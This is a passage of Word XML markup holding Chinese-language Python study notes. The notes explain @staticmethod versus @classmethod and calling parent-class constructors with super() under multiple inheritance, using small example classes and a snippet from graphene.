        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71BE91E8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36F06F3D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>@classmethod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E837AC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>@classmethod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也不需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数，但第一个参数需要是表示自身类的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ACAA63" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>@staticmethod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中要调用到这个类的一些属性方法，只能直接类名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性名或类名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261156D5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>@classmethod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为持有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数，可以来调用类的属性，类的方法，实例化对象等，避免硬编码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023CEC12" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="763914F9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class A(object):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E69BA2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    bar = 1  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57ED541E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    def foo(self):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C0DA90" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print 'foo'  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8DB414" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    @staticmethod  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A426771" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    def static_foo():  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50871D69" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">        print 'static_foo'  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A802A4C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">        print A.bar  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E387B1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    @classmethod  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D9623A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    def class_foo(cls):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9A0524" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">        print 'class_foo'  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C40728" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">        print cls.bar  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C532B2C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">        cls().foo()  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAC262E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>###</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40417B77" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A.static_foo()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2A6C62" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A.class_foo()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158CB183" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5182B41F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E44F8AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>graphene:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570508DF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class MountedType(OrderedType):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77322ECC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    @classmethod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3A3581" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    def mounted(cls, unmounted):  # noqa: N802</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63237731" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A09121" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Mount the UnmountedType instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EC8245" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404E5E65" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        assert isinstance(unmounted, UnmountedType), ("{} can't mount {}").format(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19880D8E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            cls.__name__, repr(unmounted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137CB14B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AA4045" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return cls(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B706F7B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            unmounted.get_type(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5371A869" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            *unmounted.args,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A569F2F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            _creation_counter=unmounted.creation_counter,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78259C25" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            **unmounted.kwargs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E441FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C434D8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="722C0334" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D83DFB3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6729889A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">super: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用父类方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6A6D16" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://blog.csdn.net/wo198711203217/article/details/84097274</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E7C978" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0728F0B1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class People:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A65F96" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    def __init__(self, name):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31ADDA8E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.name = name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A643FD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    def say(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068B28EA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我是人，名字为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>", self.name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AD50FB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>class Animal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B087AF5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    def __init__(self, food):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F61F7AD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.food = food</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C676631" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    def display(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C81E12" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我是动物，我吃</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>", self.food)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19368231" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class Person(People, Animal):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2D49C5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自定义构造方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7373FEB4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    def __init__(self, name, food):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FF2E0F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>调用第一个父类的构造方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F96DA3B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">        super().__init__(name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493EC8AC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">        #People.__init__(self, name)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>使用未绑定方法调用第一个父类的构造方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A55404" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">        #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>调用其他父类的构造方法，需要手动给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>传值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4994D5A6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">        Animal.__init__(self, food)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD523FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xiaobai = Person("xiaobai", "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>熟食</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D25CDB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xiaobai.say()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3540FD06" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xiaobai.display()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1937A340" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="067EA073" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42DE1938" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式</w:t>
